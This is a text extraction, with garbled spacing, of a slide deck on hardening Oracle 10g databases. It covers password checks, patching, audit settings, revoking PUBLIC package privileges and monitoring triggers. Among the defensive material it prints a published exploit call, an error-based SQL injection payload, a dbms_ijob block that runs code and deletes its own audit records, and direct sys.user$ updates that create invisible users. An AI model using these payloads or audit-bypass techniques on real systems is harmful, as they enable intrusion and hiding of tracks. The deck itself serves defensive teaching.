hardening oracle

8/12/2019 Hardening Oracle

1/33

1 2 3 4 5

6 7 8 9 10

we are here:

Best Practices for Oracle DatabasesHardening Oracle 10.2.0.3 / 10.2.0.4

Alexander Kornbrust


2/33

1 2 3 4 5

6 7 8 9 10

we are here:

Passwords (Security) Patches

Database Settings PUBLIC Privileges

Database Trigger

Compiling Views

Next Steps & Summary

Table of Content


3/33

1 2 3 4 5

6 7 8 9 10

we are here:

Weak and default passwords is still problem No.1 in mostOracle databases.

Even if Oracle default accounts like SYS, SYSTEM,

DBSNMP, are getting better, user accounts andtechnical accounts are often using weak passwords(password=username).

It is useless to spend time for Oracle Security if thedatabase is using weak/default passwords

Check (Oracle) passwords on a regular basis against acustom dictionary file

Passwords


4/33

1 2 3 4 5

6 7 8 9 10

we are here:

Do not use weak passwords and check all passwordson a regular basis, e.g. with checkpwd or repscan.

Check Passwords Regularly

C: \ >checkpwd system/[email protected]:1521/ORCL password_list.txt

Checkpwd 1. 23 [Wi n] - ( c) 2007 by Red- Dat abase- Secur i t y GmbHOr acl e Secur i t y Consul t i ng, Secur i t y Audi t s & Secur i t y Tr ai ni nght t p: / / www. r ed- dat abase- secur i t y. com

MDSYS has weak passwor d MDSYS [ EXPI RED & LOCKED]ORDSYS has weak passwor d ORDSYS [ EXPI RED & LOCKED]

DUMMY123 has weak passwor d DUMMY123 [ OPEN]DBSNMP OK [ OPEN]SCOTT has weak password TI GER [ OPEN]CTXSYS has weak passwor d CHANGE_ON_I NSTALL [ EXPI RED & LOCKED]SH has weak passwor d CHANGE_ON_I NSTALL [ EXPI RED & LOCKED]OUTLN has weak passwor d OUTLN [ EXPI RED & LOCKED]DI P has weak passwor d DI P [ EXPI RED & LOCKED]

DUMMY321 has weak passwor d 123YMMUD [ OPEN][ . . . ]SYS OK [ OPEN]SYSTEM OK [ OPEN]

Done. Summar y:

Passwor ds checked : 13900828Weak passwor ds f ound : 23El apsed t i me ( mi n: sec) : 0: 54Passwor ds / second : 265486


5/33

1 2 3 4 5

6 7 8 9 10

we are here:

If the passwords are good it is time to apply (security)patches.

You should always try to upgrade at least to a supported

version (e.g. 10.2.0.3 / 10.2.0.4).

After that you should apply the latest security patch fromOracle (January 2009 CPU).

For many reasons (newer version not supported, too many

instances, ) this is not always possible. In this caseyou should try to use a solution like Virtual Patching.

(Security) Patches


6/33

1 2 3 4 5

6 7 8 9 10

we are here:

Exploits for problems fixed with the January 2009 CPU arealready published on the internet:

exec EXFSYS. DBMS_EXPFI L_DR. GET_EXPRSET_STATS( ' EXFSYS' , ' EXF$VERSI ON' , ' EXFVERSI ON' ,' YYYYYYY" and 1=EVI LPROC( ) - - ' )

Oracle Security Community is fast


7/33

1 2 3 4 5

6 7 8 9 10

we are here:

The next step is to change the default audit settings fromOracle.

Database Settings


8/33

1 2 3 4 5

6 7 8 9 10

we are here:

audit_sys_operations

audit_sys_operationsBy default the database is not auditing SQL commands executed by theuser SYS. To change this behaviour it is necessary to change this value toTRUE. A reboot of the database is necessary after changing this value.

Command:

SQL> al t er syst em set audi t _sys_oper at i ons=t r uescope=spf i l e;


9/33

1 2 3 4 5

6 7 8 9 10

we are here:

audit_trail

audit_trailBy default the database is not auditing SQL commands. To enable auditingit is necessary to change this parameter to DB. In this case Oracle is writingall audit information from the database (but not the database vault auditinformation) into the table SYS.AUD$. Other options could be OS, DB,XML,EXTENDED . A reboot of the database is necessary after changing thisvalue.Extended is a new feature since Oracle 10g Rel.2

Command:

SQL> al t er syst em set audi t _t r ai l =DB, EXTENDEDscope=spf i l e;


10/33

1 2 3 4 5

6 7 8 9 10

we are here:

Now its time to remove dangerous privileges. The onlyquestion is

What is a dangerous package?

PUBLIC Privileges


11/33

1 2 3 4 5

6 7 8 9 10

we are here:

Now its time to remove dangerous privileges. The onlyquestion is

What is a dangerous package?

PUBLIC Privileges

If we look at the Oracle Security Checklist (Jul 2008) from Oracle, Oraclerecommends to remove the privileges from

UTL_TCPUTL_SMTP

UTL_MAILUTL_HTTPUTL_INADDRUTL_FILE


12/33

1 2 3 4 5

6 7 8 9 10

we are here:

PL/SQL Packages

What are the most dangerous packages in an Oracle database?

dbms_sql

ut l _f i l e

ut l _mai l

ut l _i naddr

ut l _t cp

dbms_l ob

dbms_xml gen

dbms_aw_xml

ct xsys. dr i t hsx

or dsys. or d_di com

kupp$pr oc


13/33

1 2 3 4 5

6 7 8 9 10

we are here:

PL/SQL Packages

What is the most dangerous package in an Oracle database?

dbms_sql (No. 1, allows privi lege escalation)

ut l _f i l e

ut l _mai l

ut l _i naddr

utl_tcp (No. 3, overtake the DB via TNS Listener)

dbms_l ob

dbms_xmlgen (No. 2, steal the entire DB with a single SQL Injection)

dbms_aw_xml

ct xsys. dr i t hsx

or dsys. or d_di com

kupp$pr oc


14/33

1 2 3 4 5

6 7 8 9 10

we are here:

PL/SQL Packages - Sample

Via a vulnerable web application it is possible to retrieve

information via error messages

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||' ' fromv$version))--


15/33

1 2 3 4 5

6 7 8 9 10

we are here:

Revoke Public Privileges I

utl_* and dbms_*

These packages are powerful and allow network access (e.g. utl_tcp,utl_http,...), file access (dbms_advisor, utl_file, ...), unsecure(dbms_random) or other powerful operations (e.g.dbms_obfuscation_toolkit). Execution privileges on these package shouldnot be granted to public.

Command (as user SYS):

SQL> r evoke execut e on ut l _ht t p f r om publ i c f or ce;SQL> r evoke execut e on ut l _t cp f r om publ i c f or ce;

SQL> r evoke execut e on ut l _f i l e f r om publ i c f or ce;

SQL> r evoke execut e on ut l _i naddr f r om publ i c f or ce;

SQL> r evoke execut e on ut l _smt p f r om publ i c f or ce;

SQL> r evoke execut e on ut l _dbws f r om publ i c f or ce;

SQL> r evoke execut e on dbms_l ob f r om publ i c f or ce;

SQL> r evoke execut e on dbms_r andom f r om publ i c f or ce;SQL> r evoke execut e on dbms_obf uscat i on_t ool ki t f r ompubl i c f or ce;


16/33

1 2 3 4 5

6 7 8 9 10

we are here:

Revoke Public Privileges II

SQL> r evoke execut e on dbms_cr ypt o_t ool ki t f r om publ i c

f or ce;

SQL> r evoke execut e on dbms_advi sor f r om publ i c f or ce;

SQL> r evoke execut e on dbms_l dap f r om publ i c f or ce;

SQL> r evoke execut e on dbms_l dap_ut l f r om publ i c f or ce;SQL> r evoke execut e on dbms_j ob f r om publ i c f or ce;

SQL> r evoke execut e on dbms_schedul er f r om publ i c f or ce;

SQL> r evoke execut e on dbms_ddl f r om publ i c f or ce;

SQL> r evoke execut e on dbms_epg f r om publ i c f or ce;

SQL> r evoke execut e on dbms_xml gen f r om publ i c f or ce;

SQL> r evoke execut e on dbms_aw_xml f r om publ i c f or ce;

SQL> r evoke execut e on ct xsys. dr i t hsx f r om publ i c f or ce;SQL> r evoke execut e on or dsys. or d_di com f r om publ i cf or ce;

R k db l f bli


17/33

1 2 3 4 5

6 7 8 9 10

we are here:

Revoke dbms_sql from public

dbms_sql

dbms_sql allows privilege escalation via the cursor technique. This problemis fixed in Oracle 11g but still possible in all previous Oracle versions.


SQL> cr eat e r ol e ROLE_DBMSSQL;

SQL> gr ant execut e on dbms_sql t o ROLE_DBMSSQL;

SQL> spool gr ant dbmssql . sql

SQL> sel ect di st i nct ' gr ant ROLE_DBMSSQL t o" ' | | owner | | ' " ; ' f r om al l _dependenci es wher er ef er enced_name = ' DBMS_SQL' and owner not i n( ' PUBLI C' ) ;

SQL> spool of fSQL> @gr ant dbmssql

SQL> r evoke execut e on dbms_sql f r om PUBLI C;

R k bli i il f Obj t T


18/33

1 2 3 4 5

6 7 8 9 10

we are here:

Revoke public privileges from Object Types

To harden the database it is necessary to revoke some privileges frommighty object types.

HTTPUriType

This object type allows every user to do HTTP-request. This can be used in

SQL Injection attacks to transfer data out of the database.Command (as user SYS):

SQL> r evoke execut e on HTTPUr i Type f r om publ i c f or ce;

D t b T i


19/33

1 2 3 4 5

6 7 8 9 10

we are here:

Database Trigger

Using Database trigger (LOGON, LOGOFF, DDL, GRANT, ERROR,SHUTDOWN, STARTUP) is a easy and powerful way to control the database.

Especially DLL trigger and Error trigger can help to achieve a better controlover the database.

DDL T i


20/33

1 2 3 4 5

6 7 8 9 10

we are here:

DDL Trigger

DDL_TRIGGER

This trigger is monitoring all DDL modifications (grant, alter, create, drop) onthe production database. It's necessary to change the IP address inside thetrigger.


SQL> cr eat e or r epl ace t r i gger DDLTr i gger

AFTER DDL ON DATABASE

DECLARE

r c VARCHAR( 4096) ;

BEGI N

begi nr c: =ut l _ht t p. r equest ( ' ht t p: / / 192. 168. 2. 201/ user =' | | or a_l ogi n_user | | ' ;

DDL_TYPE=' | | or a_sysevent | | ' ; DDL_OWNER=' | | or a_di ct _obj _owner | | ' ; DDL_NAME=' | | or a_di ct _obj _name| | ' ; sysdat e=' | | t o_char ( sysdat e, ' YYYY- MM- DDhh24: mi : ss' ) ;

except i on

when ut l _ht t p. REQUEST_FAI LED t hen nul l ; end;END;

/

Logon Trigger


21/33

1 2 3 4 5

6 7 8 9 10

we are here:

Logon Trigger

Logon Trigger

All logon requests should be monitored with a tamperproof audit log. Thiscould be implemented by using the a database logon trigger. This trigger issending all logon activities to a webserver. It's necessary to change the IPAddress.


SQL> cr eat e or r epl ace t r i gger sec_l ogon af t er l ogon on dat abase

DECLARE

r c VARCHAR( 4096) ;

begi n

begi n

r c: =ut l _ht t p. r equest ( ' ht t p: / / 192. 168. 2. 201/ l ogon_user =' | | user | | ' ; sessi oni d

=' | | sys_cont ext ( ' USERENV' , ' SESSI ONI D' ) | | ' ; host =' | | sys_cont ext ( ' USERENV' , ' HOST' ) | | ' ; i p=' | | or a_cl i ent _ i p_addr ess| | ' ; sysdat e=' | | t o_char ( sysdat e, ' YYYY-MM- DD hh24: mi : ss ' ) ) ;

except i on

when ut l _ht t p. REQUEST_FAI LED t hen nul l ; end;

End sec_l ogon; /

Error Trigger


22/33

1 2 3 4 5

6 7 8 9 10

we are here:

Error Trigger

Error trigger (optional)

This trigger is storing all Oracle error messages occurred on the server. This is really

useful to detect attacks, e.g. from SQL Injection


SQL>CREATE OR REPLACE TRI GGER af t er _er r or

AFTER SERVERERROR ON DATABASEDECLARE pragma aut onomous_t r ansact i on; i d NUMBER;sql _t ext ORA_NAME_LI ST_T; v_st mt CLOB; n NUMBER;

BEGI Nn : = or a_sql _t xt ( sql _t ext ) ;

I F n >= 1 THENFOR i I N 1. . n LOOP

v_st mt : = v_st mt | | sql _ text ( i ) ;END LOOP;

END I F;

FOR n I N 1. . or a_ser ver _er r or _dept h LOOPI F or a_ser ver _er r or ( n) i n (

' 900' , ' 906' , ' 907' , ' 911' , ' 917' , ' 920' , ' 923' , ' 933' , ' 970' , ' 1031' , ' 1476' , ' 1719', ' 1722' , ' 1742' , ' 1756' , ' 1789' , ' 1790' , ' 24247' , ' 29257' , ' 29540' ) THEN

I NSERT I NTO syst em. oraer r or VALUES ( SYS_GUI D( ), sysdat e, or a_l ogi n_user ,

or a_cl i ent _i p_addr ess, or a_ser ver _er r or ( n) , or a_ser ver _er r or _msg( n) ,v_st mt ) ;END I F; END LOOP;END af t er _er r or ; /

Oracle Auditing Problems and Issues


23/33

1 2 3 4 5

6 7 8 9 10

we are here:

Oracle Auditing Problems and Issues

Oracle Auditing is a 95% solution. If you can live with a 95% solution OracleAuditing will be sufficient for you.

Oracle Auditing problems:

can be bypassed using various ways interesting statement/object can not be audited

sometimes the wrong statement is logged

Oracle Auditing Bypassing Auditing


24/33

1 2 3 4 5

6 7 8 9 10

we are here:

Oracle Auditing Bypassing Auditing

The following problem was fixed with the January CPU 2009. Running a jobwith any PL/SQL statement via dbms_ijob does not leave any traces

Decl ar e

j j i nt eger : = 666666; - - j ob numberbegi n sys. dbms_i j ob. submi t ( J OB => j j ,

LUSER => ' SYS' , PUSER => ' SYS' , CUSER => ' SYS' ,NEXT_DATE => sysdat e, I NTERVAL => nul l ,

BROKEN => f al se, WHAT =>

' decl ar e j j i nt eger : = ' | | j j | | ' ;

begi n execut e i mmedi at e ' ' al t er syst em ar chi ve l ogcur r ent ' ' ;sys. dbms_i j ob. r emove( j j ) ;del et e f r om sys. aud$ wher e obj $name = ' ' DBMS_I J OB' ' ;commi t ;end; ' , sys. dbms_i j ob. r un( j j ) ;

end;

/


25/33

1 2 3 4 5

6 7 8 9 10

we are here:

Oracle Auditing Important objects not auditable

Important objects can not be audited. It is not possible to audit importanttables like sys.user$. This tables containts all user / role and passwordinformation from the Oracle database.

A password change could be performed by updating the table directly.

SQL> updat e sys. user $ set password = ' D4DF7931AB130E37'where name=' SYSTEM' ;

Thi s can not be audi t ed.

SQL> audi t al l on sys. user $;

audi t al l on sys. user $ERROR at l i ne 1:ORA- 00701: obj ect necessar y f or war mst ar t i ng dat abasecannot be al t er ed


26/33

1 2 3 4 5

6 7 8 9 10

we are here:

Oracle Auditing Important objects not auditable II

Another way to bypass Oracle Auditing is to modify the data dictionary objectdirectly. A user is normally created with the command "CREATE USERmyuser identified by mypassword".

Instead of using CREATE USER we can get the same result usingCREATE ROLE plus an UPDATE SYS.USER$

SQL> cr eat e r ol e myuser i dent i f i ed by mypasswor d;

- - conver t a r ol e i nt o a user

SQL> updat e sys. user $ set t ype#=1 where name=' MYUSER' ;

- - al t er nat i ve updat e, cr eat es an i nvi si bl e dat abase user

SQL> updat e sys. user $ set t ype#=2 where name=' MYUSER' ;


27/33

1 2 3 4 5

6 7 8 9 10

we are here:

Oracle Auditing Wrong statements logged

Since Oracle 10g it is possible to log the statement which caused the auditentry.

This sounds like a good feature but the database is sometimes (e.g. if VPD,

QueryRewrite, is used )modifying the SQL statement which was submitted.In this case Oracle is auditing the previous statement and not the statementwhich was executed.

This technique can be used to steal information from audited tables withoutleaving traces

Auditing I


28/33

1 2 3 4 5

6 7 8 9 10

we are here:

Auditing I

Enable Auditing

Audit interesting activities.


AUDI T CREATE USER BY ACCESS;

AUDI T ALTER USER BY ACCESS;AUDI T DROP USER BY ACCESS;

AUDI T CREATE ROLE BY ACCESS;

AUDI T SELECT ON DBA_USERS BY ACCESS;

AUDI T CREATE EXTERNAL J OB BY ACCESS; - - 10g Rel . 2

AUDI T CREATE J OB BY ACCESS; - - 10g Rel . 1

AUDI T CREATE ANY J OB BY ACCESS;

AUDI T CREATE ANY LI BRARY BY ACCESS;AUDI T ALTER DATABASE BY ACCESS;

AUDI T ALTER SYSTEM BY ACCESS;

AUDI T AUDI T SYSTEM BY ACCESS;

AUDI T EXEMPT ACCESS POLI CY BY ACCESS;AUDI T GRANT ANY PRI VI LEGE BY ACCESS;

Auditing II


29/33

1 2 3 4 5

6 7 8 9 10

we are here:

Auditing II


AUDI T GRANT ANY ROLE BY ACCESS;AUDI T ALTER PROFI LE BY ACCESS;

AUDI T CREATE ANY PROCEDURE BY ACCESS;

AUDI T ALTER ANY PROCEDURE BY ACCESS;

AUDI T DROP ANY PROCEDURE BY ACCESS;

AUDI T CREATE PUBLI C DATABASE LI NK BY ACCESS;

AUDI T CREATE PUBLI C SYNONYM BY ACCESS;

AUDI T EXECUTE ON DBMS_FGA BY ACCESS;

AUDI T EXECUTE ON DBMS_RLS BY ACCESS;

AUDI T EXECUTE ON DBMS_FI LE_TRANSFER BY ACCESS;

AUDI T EXECUTE ON DBMS_SCHEDULER BY ACCESS;AUDI T EXECUTE ON DBMS_J OB BY ACCESS;

AUDI T SELECT ON SYS. V_$SQL BY ACCESS;

AUDI T SELECT ON SYS. GV_$SQL BY ACCESS;

AUDI T EXECUTE ON SYS. KUPP$PROC BY ACCESS;AUDI T EXECUTE ON DBMS_XMLGEN BY ACCESS;AUDI T EXECUTE ON DBMS_NETWORK_ACL_ADMI N BY ACCESS; - - 11g

Recompile All Views


30/33

1 2 3 4 5

6 7 8 9 10

we are here:

Recompile All Views

Recompile all view

To get rid of the "create view" problem it is necessary to recompile all views. This

can be done with the script"$ORACLE_HOME/ CPU/ cpuapr 2008/ vi ew_r ecompi l e/ vi ew_r ecompi l e

_apr 2008cpu. sql " . This can take up to 4 hours depending of the size of your

database.


cd $ORACLE_HOME/ CPU/ cpuapr 2008/ vi ew_r ecompi l e

SQL> @vi ew_r ecompi l e_apr 2008cpu. sql

Next steps & Summary


31/33

1 2 3 4 5

6 7 8 9 10

we are here:

Next steps & Summary

This was just the baseline security for Oracle databases. If you needmore this baseline

Check your own application code

Train the DBAs, Developers and Security People

Perform regular security audit

Run database scanners regularly

Use 3rd-party products to increase the security

Links


32/33

1 2 3 4 5

6 7 8 9 10

we are here:

Links

Oracle Password Checker:http://www.red-database-security.com/software/checkpwd.htmlhttp://www.red-database-security.com/software/repscan.html

Exploit Code for January 2009 CPU:http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/

Oracle Security Checklist:http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdf

Oracle SQL Injection Tutorial:http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/
http://www.red-database-security.com/software/checkpwd.htmlhttp://www.red-database-security.com/software/repscan.htmlhttp://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/http://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://www.oracle.com/technology/deploy/security/database-security/pdf/twp_security_checklist_database.pdfhttp://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/16/proof-of-concept-how-to-bypass-oracle-auditing-using-dbms_ijob/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://blog.red-database-security.com/2009/01/21/exploit-for-january-cpu-2009-published/http://www.red-database-security.com/software/repscan.htmlhttp://www.red-database-security.com/software/checkpwd.html


33/33

1 2 3 4 5

6 7 8 9 10

we are here:

Alexander Kornbrust

Red-Database-Security GmbH

Bliesstrasse 16

D-66538 NeunkirchenGermany

Phone: +49 (0)6821 95 17 637

Fax: +49 (0)6821 91 27 354E-Mail: info @ red-database-security.com

Contact

hardening oracle

Documents